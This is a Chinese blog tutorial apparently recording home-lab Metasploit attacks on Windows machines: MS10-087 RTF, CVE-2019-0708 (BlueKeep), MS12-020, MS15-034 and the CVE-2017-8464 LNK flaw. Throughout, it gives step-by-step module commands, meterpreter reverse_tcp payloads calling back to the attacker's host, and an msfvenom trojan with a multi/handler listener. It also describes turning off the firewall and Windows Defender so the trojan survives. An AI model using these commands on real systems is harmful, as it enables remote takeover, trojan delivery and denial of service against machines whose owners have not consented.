美文网首页
Msf攻击案例

Msf攻击案例

作者: JyinP | 来源:发表于2020-03-17 17:59 被阅读0次

注意:所有攻击前先要管防火墙!

msf 之ms10-087

输入命令

  • search ms10-087;
  • 使用这个模块:
    Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    image.png
    看到一个文件

    改文件名
    image.png
    软件捆绑,设置payload: set payload windows/exec
    image.png
    调用cmd中的计算器
    image.png
    我们运行下,文件已经在这个路径下面了。
    image.png
    kail下面root文件显示隐藏文件✔
    image.png
    image.png
    root下→.msf4→local→pjy的木马文件放到桌面
    image.png
    把木马放到winxp中 点rtf文件计算器打开
    踩坑:复制的xp环境要重启一下才可以执行!!
    image.png
msfCVE-2019-0708实例
  • 为实验成功先win7系统下关闭防火墙并开启3389端口


    image.png
    image.png
  • 如下命令操作

search 2019-0708
use 1
show options(查看使用说明)
set rdp_client_ip 192.168.117 (设置当前ip是被攻击的主机ip)


image.png
image.png

show options
set payload windows/x64/meterpreter/reverse_tcp #设置反向链接


image.png

set lhost 192.168.1.119
set id 4


image.png

exploit
set rhosts 192.168.1.117 (设置被攻击主机号)
exploit
check
set target 1
exploit (目标会蓝屏)成功导致被攻击的主机蓝屏

image.png
msfCVE-2019-0708实例
  • 先开启远程3389端口然后开始做攻击实验
    命令如下:

ms12-020

search ms12-020
use 0
set rhosts 192.168.1.124 (攻击2003系统)
exploit(蓝屏)


image.png
震网三代
  • 漏洞详情
    北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).
    CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。
    CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
    攻击机:kali
    IP地址为:192.168.10.118
    靶机:win7
    IP地址:192.168.10.119
    受影响的版本
    Windows 7
    Windows 8.1
    Windows RT 8.1
    Windows 10
    Windows Server 2008
    Windows Server 2008 R2
    Windows Server 2012
    Windows Server 2012 R2
    Windows Server 2016

  • ms 2017_8464

search 2017_8464
use 0
show options
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.1.117
run/exploit

生成很多快捷方式,找到快捷方式可以存到U盘,可以单独拷贝出来有漏洞。


image.png
image.png
  • kail木马生成使用

命令如下:
kail下操作
kail:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=4444 -f exe -o payload.exe(生成木马)


image.png

kail:sz payload.exe 下载木马到桌面,此处踩坑——木马被查杀。
注意!踩坑:
尽管关闭了防火墙,但是生成的木马病毒被win10系统自带的查杀病毒给消灭了,关闭方式如下。


image.png
image.png
image.png
image.png

进入到msf下,
1.开启监听444端口:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.119
set lport 4444
exploit
当win7下点击木马,就可以监听运行

image.png
ms15-034

(windows2008系统下运行)
现在windows sever 2008 r2 系统下安装iis 方法参考
[win2008系统创建iis流程]https://www.jianshu.com/p/44c503ed447d

image.png

ms15-034
search ms15-034
use 0
set rhosts 192.168.1.4(win2008系统ip) 出现蓝屏重启

操作如下:
设置iis


image.png

更改为ip自动获取


image.png image.png

相关文章

  • Msf攻击案例

    注意:所有攻击前先要管防火墙! msf 之ms10-087 输入命令 search ms10-087; 使用这个模...

  • MS17-010漏洞

    攻击机:kali2017.2靶机:2017 service pack 1 使用msf进行攻击 首先先查找ms17-...

  • Metasploit命令参考列表

    一、MSF终端命令 show exploits 列出metasploit框架中所有的渗透攻击模块 show pay...

  • 内网打靶知识点总结

    msf内网主机存存活扫描 Metasploit 脚本Web传递攻击 meterpreter添加路由 生成木马 上传...

  • MS17-010漏洞复现

    复现环境 攻击机 kali靶机 Windows7(需要关闭防火墙) 漏洞复现过程 启动msf终端 msfconso...

  • 利用MSF进行后渗透攻击

    本篇主要讲利用MSF获取靶机shell后可进行的操作及利用方式前提:已经通过Samba服务漏洞获取了Meterpr...

  • 任务148:Exploit 模块

    msf的exploits模块分为两类,主动和被动 主动指的是攻击者主动给目标发送exploit,让目标开启某个端口...

  • beef联合msf配置

    单独开启 beef 并 hook 住客户端时,并未加载上 msf 的攻击模块,现需使 beef 启动之后自动添...

  • msf派生shell到cs

    1 msf获取shell 这里已经在用msf生成了exe 然后直接msf开启监听然后获取shell msf生成ex...

  • 记一次反弹木马实操

    原理 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统...

网友评论

      本文标题:Msf攻击案例

      本文链接:https://www.haomeiwen.com/subject/iushjhtx.html